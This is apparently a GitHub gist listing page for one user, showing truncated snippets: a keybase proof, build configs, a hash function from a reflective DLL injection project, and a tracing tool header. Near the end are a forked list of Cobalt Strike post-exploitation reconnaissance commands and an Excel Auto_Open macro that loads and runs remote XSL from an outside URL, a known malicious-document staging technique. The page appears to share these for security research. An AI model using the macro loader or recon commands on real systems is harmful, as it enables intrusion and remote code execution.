I hereby claim:
- I am GitMirar on github.
- I am mirar (https://keybase.io/mirar) on keybase.
- I have a public key whose fingerprint is 84B9 CCFF 974F 2574 1C5D F401 ECBB 8358 CBA2 065C
To claim this, I am signing this object:
Alexander Rausch GitMirar
GitMirar
/ rename_sha256.sh
Last active
May 22, 2020 10:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # rename binaries after their sha256 sum | |
| function rename_sha256 { | |
| sha256=`sha256sum "${1}" | sed 's/ .*$//'` | |
| oldPath=`readlink -f "$1"` | |
| directory=`echo ${oldPath} | sed 's/\(.*\)[/].*/\1/'` | |
| newPath="${directory}/${sha256}" |
GitMirar
/ hash.py
Created
January 24, 2020 23:13
hashing function used in https://github.com/stephenfewer/ReflectiveDLLInjection/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def _rotr(num, bits): | |
| num &= (2**bits-1) | |
| bit = num & 1 | |
| num >>= 1 | |
| if(bit): | |
| num |= (1 << (bits-1)) | |
| return num | |
| def rotr(num): | |
| key = 13 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const ( | |
| RC_NOERROR = 0 | |
| RC_FORMERR = 1 | |
| RC_SERVFAIL = 2 | |
| RC_NXDOMAIN = 3 | |
| RC_NOTIMP = 4 | |
| RC_REFUSED = 5 | |
| RC_YXDOMAIN = 6 | |
| RC_YXRRSET = 7 | |
| RC_NXRRSET = 8 |
GitMirar
/ x86-windows-static-md.cmake
Created
October 2, 2019 12:55
vcpkg triplet for static library linking with dynamically linked CRT x86
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| set(VCPKG_TARGET_ARCHITECTURE x86) | |
| set(VCPKG_CRT_LINKAGE dynamic) | |
| set(VCPKG_LIBRARY_LINKAGE static) |
GitMirar
/ x64-windows-static-md.cmake
Created
October 2, 2019 12:54
vcpkg triplet for static library linking with dynamically linked CRT x64
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| set(VCPKG_TARGET_ARCHITECTURE x64) | |
| set(VCPKG_CRT_LINKAGE dynamic) | |
| set(VCPKG_LIBRARY_LINKAGE static) |
GitMirar
/ gcc_intel_inline_asm.c
Created
May 11, 2019 09:06
gcc inline assembly intel syntax set temp to 1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| int main(int argc, char* argv[]) { | |
| int temp; | |
| temp = 42; | |
| __asm__ __volatile__ ( | |
| ".intel_syntax;" | |
| "mov %%eax, %1;" | |
| "mov %0, %%eax;" | |
| ".att_syntax;" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * PinTrace | |
| * | |
| * API call trace tool built with intel pin (https://software.intel.com/en-us/articles/pin-a-binary-instrumentation-tool-downloads). | |
| * | |
| * CC by mirar@chaosmail.org | |
| * | |
| * This module can either be run in audit mode (-a flag) or provided with a config file (-c path/to/config). | |
| * | |
| * The config format is as follows: |
GitMirar
/ keybase.md
Created
November 16, 2018 23:38
GitMirar
/ cobaltstrike_sa.txt
Created
September 30, 2018 14:09
— forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows version: | |
| reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
| Users who have authed to the system: | |
| ls C:\Users\ | |
| System env variables: | |
| reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
| Saved outbound RDP connections: |
GitMirar
/ gist:78115d363daee36d73979892c6b99567
Created
September 30, 2018 10:20
XLS macro staging (https://twitter.com/blu3_team/status/1046066227926499328)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub Auto_Open() | |
| Set XML = CreateObject("Microsoft.XMLDOM") | |
| XML.async = False | |
| Set xsl = XML | |
| xsl.Load ("hxxps://d3nvoqkqp3htqo.cloudfront.net/p_/content") | |
| XML.transformNode xsl | |
| End Sub |
NewerOlder